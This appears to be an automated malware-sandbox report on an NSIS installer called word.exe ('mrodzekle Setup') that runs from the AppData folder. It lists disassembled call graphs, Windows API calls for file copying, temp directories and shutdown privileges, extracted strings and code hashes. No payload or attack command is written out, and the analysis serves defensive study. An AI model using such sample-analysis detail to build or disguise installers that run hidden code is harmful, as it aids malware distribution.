4023->4024 4025 4023ec 4024->4025 4026 402a29 18 API calls 4025->4026 4027 4023f5 4026->4027 4028 4023ff RegQueryValueExA 4027->4028 4033 40268f 4027->4033 4029 40241f 4028->4029 4030 402425 RegCloseKey 4028->4030 4029->4030 4034 405af6 wsprintfA 4029->4034 4030->4033 4034->4030 4035 4045e3 4036 4045f3 4035->4036 4037 40460f 4035->4037 4046 40543d GetDlgItemTextA 4036->4046 4039 404642 4037->4039 4040 404615 SHGetPathFromIDListA 4037->4040 4042 40462c SendMessageA 4040->4042 4043 404625 4040->4043 4041 404600 SendMessageA 4041->4037 4042->4039 4044 40140b 2 API calls 4043->4044 4044->4042 4046->4041 4047 403f68 lstrcpynA lstrlenA 4048 402b6e 4049 402b7d SetTimer 
4048->4049 4051 402b96 4048->4051 4049->4051 4050 402beb 4051->4050 4052 402bb0 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4051->4052 4052->4050 4053 4014f0 SetForegroundWindow 4054 4028be 4053->4054 4055 402671 4056 402a29 18 API calls 4055->4056 4057 402678 FindFirstFileA 4056->4057 4058 40269b 4057->4058 4059 40268b 4057->4059 4060 4026a2 4058->4060 4063 405af6 wsprintfA 4058->4063 4064 405b98 lstrcpynA 4060->4064 4063->4060 4064->4059 4065 4024f1 4066 4024f6 4065->4066 4067 402507 4065->4067 4069 402a0c 18 API calls 4066->4069 4068 402a29 18 API calls 4067->4068 4070 40250e lstrlenA 4068->4070 4071 4024fd 4069->4071 4070->4071 4072 40252d WriteFile 4071->4072 4073 40268f 4071->4073 4072->4073 4086 4018f5 4087 40192c 4086->4087 4088 402a29 18 API calls 4087->4088 4089 401931 4088->4089 4090 4054bd 70 API calls 4089->4090 4091 40193a 4090->4091 4092 4018f8 4093 402a29 18 API calls 4092->4093 4094 4018ff 4093->4094 4095 405459 MessageBoxIndirectA 4094->4095 4096 401908 4095->4096 3420 4030fb SetErrorMode GetVersion 3421 403133 3420->3421 3422 403139 3420->3422 3423 405f28 5 API calls 3421->3423 3424 405eba 3 API calls 3422->3424 3423->3422 3425 40314f lstrlenA 3424->3425 3425->3422 3426 40315e 3425->3426 3427 405f28 5 API calls 3426->3427 3428 403165 3427->3428 3429 405f28 5 API calls 3428->3429 3430 40316c #17 OleInitialize SHGetFileInfoA 3429->3430 3510 405b98 lstrcpynA 3430->3510 3432 4031a9 GetCommandLineA 3511 405b98 lstrcpynA 3432->3511 3434 4031bb GetModuleHandleA 3435 4031d2 3434->3435 3436 4056b6 CharNextA 3435->3436 3437 4031e6 CharNextA 3436->3437 3443 4031f3 3437->3443 3438 403260 3439 403273 GetTempPathA 3438->3439 3512 4030ca 3439->3512 3441 403289 3444 4032b1 DeleteFileA 3441->3444 3445 40328d GetWindowsDirectoryA lstrcatA 3441->3445 3442 4056b6 CharNextA 3442->3443 3443->3438 3443->3442 3449 403262 3443->3449 3522 402c55 GetTickCount GetModuleFileNameA 3444->3522 3447 4030ca 12 API calls 3445->3447 3448 4032a9 3447->3448 3448->3444 3451 403332 
ExitProcess OleUninitialize 3448->3451 3606 405b98 lstrcpynA 3449->3606 3450 4032c5 3450->3451 3453 40331e 3450->3453 3457 4056b6 CharNextA 3450->3457 3454 403456 3451->3454 3455 403347 3451->3455 3550 4035eb 3453->3550 3459 4034f9 ExitProcess 3454->3459 3464 405f28 5 API calls 3454->3464 3458 405459 MessageBoxIndirectA 3455->3458 3461 4032dc 3457->3461 3463 403355 ExitProcess 3458->3463 3460 40332e 3460->3451 3468 4032f9 3461->3468 3469 40335d 3461->3469 3465 403469 3464->3465 3466 405f28 5 API calls 3465->3466 3467 403472 3466->3467 3470 405f28 5 API calls 3467->3470 3472 40576c 18 API calls 3468->3472 3471 4053e0 5 API calls 3469->3471 3473 40347b 3470->3473 3474 403362 lstrcatA 3471->3474 3475 403304 3472->3475 3476 403499 3473->3476 3485 403489 GetCurrentProcess 3473->3485 3477 403373 lstrcatA 3474->3477 3478 40337e lstrcatA lstrcmpiA 3474->3478 3475->3451 3607 405b98 lstrcpynA 3475->3607 3481 405f28 5 API calls 3476->3481 3477->3478 3478->3451 3479 40339a 3478->3479 3482 4033a6 3479->3482 3483 40339f 3479->3483 3486 4034d0 3481->3486 3490 4053c3 2 API calls 3482->3490 3488 405346 4 API calls 3483->3488 3484 403313 3608 405b98 lstrcpynA 3484->3608 3485->3476 3487 4034e5 ExitWindowsEx 3486->3487 3492 4034f2 3486->3492 3487->3459 3487->3492 3491 4033a4 3488->3491 3493 4033ab SetCurrentDirectoryA 3490->3493 3491->3493 3494 40140b 2 API calls 3492->3494 3495 4033c5 3493->3495 3496 4033ba 3493->3496 3494->3459 3610 405b98 lstrcpynA 3495->3610 3609 405b98 lstrcpynA 3496->3609 3499 4033d3 3500 405bba 18 API calls 3499->3500 3503 40344a 3499->3503 3504 4058e6 40 API calls 3499->3504 3507 405bba 18 API calls 3499->3507 3508 4053f8 2 API calls 3499->3508 3509 403436 CloseHandle 3499->3509 3501 4033f5 DeleteFileA 3500->3501 3501->3499 3502 403402 CopyFileA 3501->3502 3502->3499 3505 4058e6 40 API calls 3503->3505 3504->3499 3506 403451 3505->3506 3506->3451 3507->3499 3508->3499 3509->3499 3510->3432 3511->3434 3513 405dfa 5 API calls 3512->3513 3515 4030d6 3513->3515 
3514 4030e0 3514->3441 3515->3514 3516 40568b 3 API calls 3515->3516 3517 4030e8 3516->3517 3518 4053c3 2 API calls 3517->3518 3519 4030ee 3518->3519 3611 40589e 3519->3611 3615 40586f GetFileAttributesA CreateFileA 3522->3615 3524 402c95 3544 402ca5 3524->3544 3616 405b98 lstrcpynA 3524->3616 3526 402cbb 3527 4056d2 2 API calls 3526->3527 3528 402cc1 3527->3528 3617 405b98 lstrcpynA 3528->3617 3530 402ccc GetFileSize 3531 402ce3 3530->3531 3547 402dc8 3530->3547 3534 403081 ReadFile 3531->3534 3537 402e34 3531->3537 3531->3544 3546 402bf1 6 API calls 3531->3546 3531->3547 3533 402dd1 3535 402e01 GlobalAlloc 3533->3535 3533->3544 3629 4030b3 SetFilePointer 3533->3629 3534->3531 3630 4030b3 SetFilePointer 3535->3630 3541 402bf1 6 API calls 3537->3541 3539 402dea 3542 403081 ReadFile 3539->3542 3540 402e1c 3543 402e8e 37 API calls 3540->3543 3541->3544 3545 402df5 3542->3545 3548 402e28 3543->3548 3544->3450 3545->3535 3545->3544 3546->3531 3618 402bf1 3547->3618 3548->3544 3549 402e65 SetFilePointer 3548->3549 3549->3544 3551 405f28 5 API calls 3550->3551 3552 4035ff 3551->3552 3553 403617 3552->3553 3555 403605 3552->3555 3554 405a7f 3 API calls 3553->3554 3556 403638 3554->3556 3640 405af6 wsprintfA 3555->3640 3558 403656 lstrcatA 3556->3558 3560 405a7f 3 API calls 3556->3560 3559 403615 3558->3559 3631 4038b4 3559->3631 3560->3558 3563 40576c 18 API calls 3564 403688 3563->3564 3565 403711 3564->3565 3567 405a7f 3 API calls 3564->3567 3566 40576c 18 API calls 3565->3566 3568 403717 3566->3568 3569 4036b4 3567->3569 3570 403727 LoadImageA 3568->3570 3571 405bba 18 API calls 3568->3571 3569->3565 3574 4036d0 lstrlenA 3569->3574 3578 4056b6 CharNextA 3569->3578 3572 403752 RegisterClassA 3570->3572 3573 4037db 3570->3573 3571->3570 3575 4037e5 3572->3575 3576 40378e SystemParametersInfoA CreateWindowExA 3572->3576 3577 40140b 2 API calls 3573->3577 3579 403704 3574->3579 3580 4036de lstrcmpiA 3574->3580 3575->3460 3576->3573 3581 4037e1 3577->3581 3583 4036ce 
3578->3583 3582 40568b 3 API calls 3579->3582 3580->3579 3584 4036ee GetFileAttributesA 3580->3584 3581->3575 3585 4038b4 19 API calls 3581->3585 3586 40370a 3582->3586 3583->3574 3587 4036fa 3584->3587 3588 4037f2 3585->3588 3641 405b98 lstrcpynA 3586->3641 3587->3579 3590 4056d2 2 API calls 3587->3590 3591 403881 3588->3591 3592 4037fe ShowWindow 3588->3592 3590->3579 3642 404f56 OleInitialize 3591->3642 3594 405eba 3 API calls 3592->3594 3596 403816 3594->3596 3595 403887 3597 4038a3 3595->3597 3598 40388b 3595->3598 3599 403824 GetClassInfoA 3596->3599 3601 405eba 3 API calls 3596->3601 3600 40140b 2 API calls 3597->3600 3598->3575 3604 40140b 2 API calls 3598->3604 3602 403838 GetClassInfoA RegisterClassA 3599->3602 3603 40384e DialogBoxParamA 3599->3603 3600->3575 3601->3599 3602->3603 3605 40140b 2 API calls 3603->3605 3604->3575 3605->3575 3606->3439 3607->3484 3608->3453 3609->3495 3610->3499 3612 4058a9 GetTickCount GetTempFileNameA 3611->3612 3613 4058d5 3612->3613 3614 4030f9 3612->3614 3613->3612 3613->3614 3614->3441 3615->3524 3616->3526 3617->3530 3619 402c12 3618->3619 3620 402bfa 3618->3620 3623 402c22 GetTickCount 3619->3623 3624 402c1a 3619->3624 3621 402c03 DestroyWindow 3620->3621 3622 402c0a 3620->3622 3621->3622 3622->3533 3626 402c30 CreateDialogParamA ShowWindow 3623->3626 3627 402c53 3623->3627 3625 405f64 2 API calls 3624->3625 3628 402c20 3625->3628 3626->3627 3627->3533 3628->3533 3629->3539 3630->3540 3632 4038c8 3631->3632 3649 405af6 wsprintfA 3632->3649 3634 403939 3635 405bba 18 API calls 3634->3635 3636 403945 SetWindowTextA 3635->3636 3637 403961 3636->3637 3638 403666 3636->3638 3637->3638 3639 405bba 18 API calls 3637->3639 3638->3563 3639->3637 3640->3559 3641->3565 3643 403ea0 SendMessageA 3642->3643 3644 404f79 3643->3644 3647 401389 2 API calls 3644->3647 3648 404fa0 3644->3648 3645 403ea0 SendMessageA 3646 404fb2 OleUninitialize 3645->3646 3646->3595 3647->3644 3648->3645 3649->3634 4097 4014fe 4098 401506 4097->4098 4100 
401519 4097->4100 4099 402a0c 18 API calls 4098->4099 4099->4100 4101 4025ff 4102 402606 4101->4102 4103 40286b 4101->4103 4104 402a0c 18 API calls 4102->4104 4105 402611 4104->4105 4106 402618 SetFilePointer 4105->4106 4106->4103 4107 402628 4106->4107 4109 405af6 wsprintfA 4107->4109 4109->4103 4110 401000 4111 401037 BeginPaint GetClientRect 4110->4111 4113 40100c DefWindowProcA 4110->4113 4114 4010f3 4111->4114 4117 401179 4113->4117 4115 401073 CreateBrushIndirect FillRect DeleteObject 4114->4115 4116 4010fc 4114->4116 4115->4114 4118 401102 CreateFontIndirectA 4116->4118 4119 401167 EndPaint 4116->4119 4118->4119 4120 401112 6 API calls 4118->4120 4119->4117 4120->4119 3127 403981 3128 403ad4 3127->3128 3129 403999 3127->3129 3130 403b25 3128->3130 3131 403ae5 GetDlgItem GetDlgItem 3128->3131 3129->3128 3132 4039a5 3129->3132 3134 403b7f 3130->3134 3226 401389 3130->3226 3223 403e54 3131->3223 3135 4039b0 SetWindowPos 3132->3135 3136 4039c3 3132->3136 3145 403acf 3134->3145 3200 403ea0 3134->3200 3135->3136 3137 4039e0 3136->3137 3138 4039c8 ShowWindow 3136->3138 3141 403a02 3137->3141 3142 4039e8 DestroyWindow 3137->3142 3138->3137 3139 403b0f SetClassLongA 3143 40140b 2 API calls 3139->3143 3147 403a07 SetWindowLongA 3141->3147 3148 403a18 3141->3148 3146 403dfe 3142->3146 3143->3130 3146->3145 3155 403e0e ShowWindow 3146->3155 3147->3145 3152 403ac1 3148->3152 3153 403a24 GetDlgItem 3148->3153 3150 40140b 2 API calls 3167 403b91 3150->3167 3151 403ddf DestroyWindow EndDialog 3151->3146 3209 403ebb 3152->3209 3156 403a54 3153->3156 3157 403a37 SendMessageA IsWindowEnabled 3153->3157 3154 403b5b SendMessageA 3154->3145 3155->3145 3160 403a61 3156->3160 3162 403aa8 SendMessageA 3156->3162 3163 403a74 3156->3163 3171 403a59 3156->3171 3157->3145 3157->3156 3159 405bba 18 API calls 3159->3167 3160->3162 3160->3171 3162->3152 3164 403a91 3163->3164 3165 403a7c 3163->3165 3169 40140b 2 API calls 3164->3169 3203 40140b 3165->3203 3166 403a8f 3166->3152 3167->3150 
3167->3151 3167->3159 3170 403e54 19 API calls 3167->3170 3173 403e54 19 API calls 3167->3173 3172 403a98 3169->3172 3170->3167 3206 403e2d 3171->3206 3172->3152 3172->3171 3174 403c0c GetDlgItem 3173->3174 3175 403c21 3174->3175 3176 403c29 ShowWindow EnableWindow 3174->3176 3175->3176 3230 403e76 EnableWindow 3176->3230 3178 403c53 EnableWindow 3181 403c67 3178->3181 3179 403c6c GetSystemMenu EnableMenuItem SendMessageA 3180 403c9c SendMessageA 3179->3180 3179->3181 3180->3181 3181->3179 3231 403e89 SendMessageA 3181->3231 3232 405b98 lstrcpynA 3181->3232 3184 403cca lstrlenA 3185 405bba 18 API calls 3184->3185 3186 403cdb SetWindowTextA 3185->3186 3187 401389 2 API calls 3186->3187 3188 403cec 3187->3188 3188->3145 3188->3167 3189 403d1f DestroyWindow 3188->3189 3191 403d1a 3188->3191 3189->3146 3190 403d39 CreateDialogParamA 3189->3190 3190->3146 3192 403d6c 3190->3192 3191->3145 3193 403e54 19 API calls 3192->3193 3194 403d77 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3193->3194 3195 401389 2 API calls 3194->3195 3196 403dbd 3195->3196 3196->3145 3197 403dc5 ShowWindow 3196->3197 3198 403ea0 SendMessageA 3197->3198 3199 403ddd 3198->3199 3199->3146 3201 403eb8 3200->3201 3202 403ea9 SendMessageA 3200->3202 3201->3167 3202->3201 3204 401389 2 API calls 3203->3204 3205 401420 3204->3205 3205->3171 3207 403e34 3206->3207 3208 403e3a SendMessageA 3206->3208 3207->3208 3208->3166 3210 403ed3 GetWindowLongA 3209->3210 3220 403f5c 3209->3220 3211 403ee4 3210->3211 3210->3220 3212 403ef3 GetSysColor 3211->3212 3213 403ef6 3211->3213 3212->3213 3214 403f06 SetBkMode 3213->3214 3215 403efc SetTextColor 3213->3215 3216 403f24 3214->3216 3217 403f1e GetSysColor 3214->3217 3215->3214 3218 403f35 3216->3218 3219 403f2b SetBkColor 3216->3219 3217->3216 3218->3220 3221 403f48 DeleteObject 3218->3221 3222 403f4f CreateBrushIndirect 3218->3222 3219->3218 3220->3145 3221->3222 3222->3220 3224 405bba 18 API calls 3223->3224 3225 403e5f SetDlgItemTextA 3224->3225 

                                  Control-flow Graph

                                  APIs
                                  • SetErrorMode.KERNELBASE ref: 00403121
                                  • GetVersion.KERNEL32 ref: 00403127
                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                  • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                  • OleInitialize.OLE32(00000000), ref: 00403178
                                  • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                                  • GetCommandLineA.KERNEL32(mrodzekle Setup,NSIS Error), ref: 004031A9
                                  • GetModuleHandleA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000000), ref: 004031BC
                                  • CharNextA.USER32(00000000), ref: 004031E7
                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040327E
                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                                  • DeleteFileA.KERNELBASE(1033), ref: 004032B6
                                    • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                    • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                  • ExitProcess.KERNELBASE(00000020), ref: 00403332
                                  • OleUninitialize.OLE32 ref: 00403337
                                  • ExitProcess.KERNEL32 ref: 00403357
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 0040336A
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 00403379
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 00403384
                                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 00403390
                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                  • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                  • CopyFileA.KERNEL32 ref: 0040340A
                                  • CloseHandle.KERNEL32(00000000), ref: 00403437
                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004034E8
                                  • ExitProcess.KERNEL32 ref: 0040350B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                  • String ID: $ /D=$ _?=$"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\word.exe$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$mrodzekle Setup$~nsu
                                  • API String ID: 1031542678-1864608781
                                  • Opcode ID: 8f74911709186bddaf2cccf0b89ea8509ed7bd73a7a07ba236b5c5ff12a0dd9f
                                  • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                                  • Opcode Fuzzy Hash: 8f74911709186bddaf2cccf0b89ea8509ed7bd73a7a07ba236b5c5ff12a0dd9f
                                  • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                                  • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                  • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                  • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                  • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040560F
                                  • FindClose.KERNELBASE(?), ref: 00405620
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\*.*$C:\Users\user\AppData\Roaming\word.exe$\*.*
                                  • API String ID: 2035342205-1417842008
                                  • Opcode ID: 6e39d08db0da8798d4da0934d55880c8f60954caf57b81e1320f45a4632593a2
                                  • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                                  • Opcode Fuzzy Hash: 6e39d08db0da8798d4da0934d55880c8f60954caf57b81e1320f45a4632593a2
                                  • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                  • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                                  • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                  • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 738 405e93-405ea7 FindFirstFileA 739 405eb4 738->739 740 405ea9-405eb2 FindClose 738->740 741 405eb6-405eb7 739->741 740->741
                                  APIs
                                  • FindFirstFileA.KERNELBASE(?,00422588,C:\,004057AF,C:\,C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                  • FindClose.KERNEL32(00000000), ref: 00405EAA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID: C:\
                                  • API String ID: 2295610775-3404278061
                                  • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                  • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                                  • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                  • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                   control_flow_graph 132 403981-403993 133 403ad4-403ae3 132->133 134 403999-40399f 132->134 135 403b32-403b47 133->135 136 403ae5-403b2d GetDlgItem * 2 call 403e54 SetClassLongA call 40140b 133->136 134->133 137 4039a5-4039ae 134->137 139 403b87-403b8c call 403ea0 135->139 140 403b49-403b4c 135->140 136->135 141 4039b0-4039bd SetWindowPos 137->141 142 4039c3-4039c6 137->142 154 403b91-403bac 139->154 146 403b4e-403b59 call 401389 140->146 147 403b7f-403b81 140->147 141->142 143 4039e0-4039e6 142->143 144 4039c8-4039da ShowWindow 142->144 149 403a02-403a05 143->149 150 4039e8-4039fd DestroyWindow 143->150 144->143 146->147 168 403b5b-403b7a SendMessageA 146->168 147->139 153 403e21 147->153 158 403a07-403a13 SetWindowLongA 149->158 159 403a18-403a1e 149->159 156 403dfe-403e04 150->156 155 403e23-403e2a 153->155 161 403bb5-403bbb 154->161 162 403bae-403bb0 call 40140b 154->162 156->153 169 403e06-403e0c 156->169 158->155 166 403ac1-403acf call 403ebb 159->166 167 403a24-403a35 GetDlgItem 159->167 164 403bc1-403bcc 161->164 165 403ddf-403df8 DestroyWindow EndDialog 161->165 162->161 164->165 171 403bd2-403c1f call 405bba call 403e54 * 3 GetDlgItem 164->171 165->156 166->155 172 403a54-403a57 167->172 173 403a37-403a4e SendMessageA IsWindowEnabled 167->173 168->155 169->153 170 403e0e-403e17 ShowWindow 169->170 170->153 202 403c21-403c26 171->202 203 403c29-403c65 ShowWindow EnableWindow call 403e76 EnableWindow 171->203 176 403a59-403a5a 172->176 177 403a5c-403a5f 172->177 173->153 173->172 180 403a8a-403a8f call 403e2d 176->180 181 403a61-403a67 177->181 182 403a6d-403a72 177->182 180->166 185 403aa8-403abb SendMessageA 181->185 186 403a69-403a6b 181->186 182->185 187 403a74-403a7a 182->187 185->166 186->180 188 403a91-403a9a call 40140b 187->188 189 403a7c-403a82 call 40140b 187->189 188->166 199 403a9c-403aa6 188->199 198 403a88 189->198 198->180 199->198 202->203 206 403c67-403c68 203->206 207 403c6a 203->207 208 403c6c-403c9a GetSystemMenu EnableMenuItem SendMessageA 206->208 207->208 209 403c9c-403cad SendMessageA 208->209 210 403caf 208->210 211 403cb5-403cee call 403e89 call 405b98 lstrlenA call 405bba SetWindowTextA call 401389 209->211 210->211 211->154 220 403cf4-403cf6 211->220 220->154 221 403cfc-403d00 220->221 222 403d02-403d08 221->222 223 403d1f-403d33 DestroyWindow 221->223 222->153 224 403d0e-403d14 222->224 223->156 225 403d39-403d66 CreateDialogParamA 223->225 224->154 226 403d1a 224->226 225->156 227 403d6c-403dc3 call 403e54 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 225->227 226->153 227->153 232 403dc5-403ddd ShowWindow call 403ea0 227->232 232->156
                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                  • ShowWindow.USER32(?), ref: 004039DA
                                  • DestroyWindow.USER32 ref: 004039EE
                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A0A
                                  • GetDlgItem.USER32(?,?), ref: 00403A2B
                                  • SendMessageA.USER32 ref: 00403A3F
                                  • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                  • GetDlgItem.USER32(?,00000001), ref: 00403AF4
                                  • GetDlgItem.USER32(?,00000002), ref: 00403AFE
                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403B18
                                  • SendMessageA.USER32 ref: 00403B69
                                  • GetDlgItem.USER32(?,00000003), ref: 00403C0F
                                  • ShowWindow.USER32(00000000,?), ref: 00403C30
                                  • EnableWindow.USER32(?,?), ref: 00403C42
                                  • EnableWindow.USER32(?,?), ref: 00403C5D
